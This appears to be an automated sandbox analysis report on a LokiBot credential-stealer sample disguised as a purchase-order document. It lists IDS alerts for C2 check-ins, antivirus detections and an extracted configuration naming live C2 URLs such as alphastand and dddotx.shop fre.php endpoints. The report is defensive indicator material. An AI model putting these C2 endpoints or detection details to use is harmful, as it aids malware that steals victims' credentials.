            2024-09-25T10:20:17.701124+020028257661Malware Command and Control Activity Detected192.168.2.749780188.114.97.380TCP
            2024-09-25T10:20:18.577128+020028257661Malware Command and Control Activity Detected192.168.2.749781188.114.97.380TCP
            2024-09-25T10:20:19.388646+020028257661Malware Command and Control Activity Detected192.168.2.749782188.114.97.380TCP
            2024-09-25T10:20:20.429528+020028257661Malware Command and Control Activity Detected192.168.2.749783188.114.97.380TCP
            2024-09-25T10:20:21.233233+020028257661Malware Command and Control Activity Detected192.168.2.749784188.114.97.380TCP
            2024-09-25T10:20:22.045367+020028257661Malware Command and Control Activity Detected192.168.2.749785188.114.97.380TCP
            2024-09-25T10:20:22.876653+020028257661Malware Command and Control Activity Detected192.168.2.749786188.114.97.380TCP
            2024-09-25T10:20:23.686182+020028257661Malware Command and Control Activity Detected192.168.2.749787188.114.97.380TCP
            2024-09-25T10:20:24.545070+020028257661Malware Command and Control Activity Detected192.168.2.749788188.114.97.380TCP
            2024-09-25T10:20:25.516198+020028257661Malware Command and Control Activity Detected192.168.2.749789188.114.97.380TCP
            2024-09-25T10:20:26.367186+020028257661Malware Command and Control Activity Detected192.168.2.749790188.114.97.380TCP
            2024-09-25T10:20:27.187595+020028257661Malware Command and Control Activity Detected192.168.2.749791188.114.97.380TCP
            2024-09-25T10:20:28.005117+020028257661Malware Command and Control Activity Detected192.168.2.749792188.114.97.380TCP
            2024-09-25T10:20:28.823348+020028257661Malware Command and Control Activity Detected192.168.2.749793188.114.97.380TCP
            2024-09-25T10:20:29.793057+020028257661Malware Command and Control Activity Detected192.168.2.749794188.114.97.380TCP
            2024-09-25T10:20:30.724248+020028257661Malware Command and Control Activity Detected192.168.2.749795188.114.97.380TCP
            2024-09-25T10:20:31.529840+020028257661Malware Command and Control Activity Detected192.168.2.749796188.114.97.380TCP
            2024-09-25T10:20:32.349270+020028257661Malware Command and Control Activity Detected192.168.2.749797188.114.97.380TCP
            2024-09-25T10:20:33.159073+020028257661Malware Command and Control Activity Detected192.168.2.749798188.114.97.380TCP
            2024-09-25T10:20:34.004751+020028257661Malware Command and Control Activity Detected192.168.2.749799188.114.97.380TCP
            2024-09-25T10:20:34.831696+020028257661Malware Command and Control Activity Detected192.168.2.749800188.114.97.380TCP
            2024-09-25T10:20:35.676731+020028257661Malware Command and Control Activity Detected192.168.2.749801188.114.97.380TCP
            2024-09-25T10:20:36.488105+020028257661Malware Command and Control Activity Detected192.168.2.749802188.114.97.380TCP
            2024-09-25T10:20:37.347438+020028257661Malware Command and Control Activity Detected192.168.2.749803188.114.97.380TCP
            2024-09-25T10:20:38.170705+020028257661Malware Command and Control Activity Detected192.168.2.749804188.114.97.380TCP
            2024-09-25T10:20:38.983344+020028257661Malware Command and Control Activity Detected192.168.2.749805188.114.97.380TCP
            2024-09-25T10:20:39.812510+020028257661Malware Command and Control Activity Detected192.168.2.749806188.114.97.380TCP
            2024-09-25T10:20:40.679656+020028257661Malware Command and Control Activity Detected192.168.2.749807188.114.97.380TCP
            2024-09-25T10:20:41.532089+020028257661Malware Command and Control Activity Detected192.168.2.749808188.114.97.380TCP
            2024-09-25T10:20:42.407099+020028257661Malware Command and Control Activity Detected192.168.2.749809188.114.97.380TCP
            2024-09-25T10:20:43.201046+020028257661Malware Command and Control Activity Detected192.168.2.749810188.114.97.380TCP
            2024-09-25T10:20:44.020697+020028257661Malware Command and Control Activity Detected192.168.2.749811188.114.97.380TCP
            2024-09-25T10:20:44.843940+020028257661Malware Command and Control Activity Detected192.168.2.749812188.114.97.380TCP
            2024-09-25T10:20:45.767835+020028257661Malware Command and Control Activity Detected192.168.2.749813188.114.97.380TCP
            2024-09-25T10:20:46.581998+020028257661Malware Command and Control Activity Detected192.168.2.749814188.114.97.380TCP
            2024-09-25T10:20:47.383984+020028257661Malware Command and Control Activity Detected192.168.2.749815188.114.97.380TCP
            2024-09-25T10:20:48.345316+020028257661Malware Command and Control Activity Detected192.168.2.749816188.114.97.380TCP
            2024-09-25T10:20:49.177011+020028257661Malware Command and Control Activity Detected192.168.2.749817188.114.97.380TCP
            2024-09-25T10:20:50.264754+020028257661Malware Command and Control Activity Detected192.168.2.749818188.114.97.380TCP
            2024-09-25T10:20:51.117098+020028257661Malware Command and Control Activity Detected192.168.2.749819188.114.97.380TCP
            2024-09-25T10:20:51.965926+020028257661Malware Command and Control Activity Detected192.168.2.749820188.114.97.380TCP
            2024-09-25T10:20:52.847890+020028257661Malware Command and Control Activity Detected192.168.2.749821188.114.97.380TCP
            2024-09-25T10:20:53.648400+020028257661Malware Command and Control Activity Detected192.168.2.749822188.114.97.380TCP
            2024-09-25T10:20:54.469239+020028257661Malware Command and Control Activity Detected192.168.2.749823188.114.97.380TCP
            2024-09-25T10:20:55.277763+020028257661Malware Command and Control Activity Detected192.168.2.749824188.114.97.380TCP
            2024-09-25T10:20:56.095548+020028257661Malware Command and Control Activity Detected192.168.2.749825188.114.97.380TCP
            2024-09-25T10:20:56.943672+020028257661Malware Command and Control Activity Detected192.168.2.749826188.114.97.380TCP
            2024-09-25T10:20:57.765117+020028257661Malware Command and Control Activity Detected192.168.2.749827188.114.97.380TCP
            2024-09-25T10:20:58.604735+020028257661Malware Command and Control Activity Detected192.168.2.749828188.114.97.380TCP
            2024-09-25T10:21:00.485716+020028257661Malware Command and Control Activity Detected192.168.2.749829188.114.97.380TCP
            2024-09-25T10:21:00.652378+020028257661Malware Command and Control Activity Detected192.168.2.749830188.114.97.380TCP
            2024-09-25T10:21:01.509563+020028257661Malware Command and Control Activity Detected192.168.2.749831188.114.97.380TCP
            2024-09-25T10:21:02.530015+020028257661Malware Command and Control Activity Detected192.168.2.749832188.114.97.380TCP
            2024-09-25T10:21:03.370905+020028257661Malware Command and Control Activity Detected192.168.2.749833188.114.97.380TCP
            2024-09-25T10:21:04.493818+020028257661Malware Command and Control Activity Detected192.168.2.749834188.114.97.380TCP
            2024-09-25T10:21:05.272946+020028257661Malware Command and Control Activity Detected192.168.2.749835188.114.97.380TCP
            2024-09-25T10:21:06.101214+020028257661Malware Command and Control Activity Detected192.168.2.749836188.114.97.380TCP
            2024-09-25T10:21:06.901425+020028257661Malware Command and Control Activity Detected192.168.2.749837188.114.97.380TCP
            2024-09-25T10:21:07.859251+020028257661Malware Command and Control Activity Detected192.168.2.749838188.114.97.380TCP
            2024-09-25T10:21:09.943417+020028257661Malware Command and Control Activity Detected192.168.2.749839188.114.97.380TCP
            2024-09-25T10:21:10.818081+020028257661Malware Command and Control Activity Detected192.168.2.749840188.114.97.380TCP
            2024-09-25T10:21:11.674440+020028257661Malware Command and Control Activity Detected192.168.2.749841188.114.97.380TCP
            2024-09-25T10:21:12.571148+020028257661Malware Command and Control Activity Detected192.168.2.749842188.114.97.380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: (PO403810)_VOLEX_doc.exeAvira: detected
            Source: http://alphastand.top/alien/fre.phpAvira URL Cloud: Label: phishing
            Source: http://alphastand.trade/alien/fre.phpAvira URL Cloud: Label: malware
            Source: http://alphastand.win/alien/fre.phpAvira URL Cloud: Label: phishing
            Source: https://dddotx.shop/Mine/PWS/fre.phpAvira URL Cloud: Label: malware
            Source: http://kbfvzoboss.bid/alien/fre.phpAvira URL Cloud: Label: phishing
            Source: http://dddotx.shop/Mine/PWS/fre.phpAvira URL Cloud: Label: malware
            Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
            Source: (PO403810)_VOLEX_doc.exeReversingLabs: Detection: 52%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: (PO403810)_VOLEX_doc.exeJoe Sandbox ML: detected
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: BATMAN.pdbxD source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Sept10F.pdb source: (PO403810)_VOLEX_doc.exe
            Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589991317.00000000006E2000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: BATMAN.pdb source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49707 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49707 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49707 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49726 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49726 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49725 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49725 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49725 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49726 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49709 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49726 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49709 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49704 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49709 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49726 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49706 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49706 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49724 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49706 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49724 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49724 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49707 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49743 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49743 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49743 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49724 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49724 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49709 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49709 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49707 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49754 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49732 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49725 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49725 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49732 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49732 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49745 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49745 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49754 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49704 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49745 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49704 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49757 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49757 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49757 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49707
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49754 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49704 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49704 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49741 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49757 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49757 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49745 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49724
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49741 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49732 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49741 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49732 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49743 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49750 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49750 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49750 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49732
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49715 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49703 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49703 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49701 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49701 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49701 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49703 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49743 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49725
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49723 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49723 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49723 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49750 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49715 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49715 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49701 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49701 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49723 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49723 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49713 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49713 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49704
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49713 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49750 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49703 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49723
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49703 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49713 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49715 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49754 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49712 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49754 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49712 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49741 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49712 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49741 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49747 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49727 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49727 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49727 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49750
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49720 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49727 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49727 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49772 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49772 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49772 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49711 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49757
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49772 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49712 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49772 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49712 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49772
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49756 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49756 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49756 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49712
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49765 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49715 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49727
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.97.3:80 -> 192.168.2.7:49703
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49758 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49779 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49779 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49779 -> 188.114.97.3:80
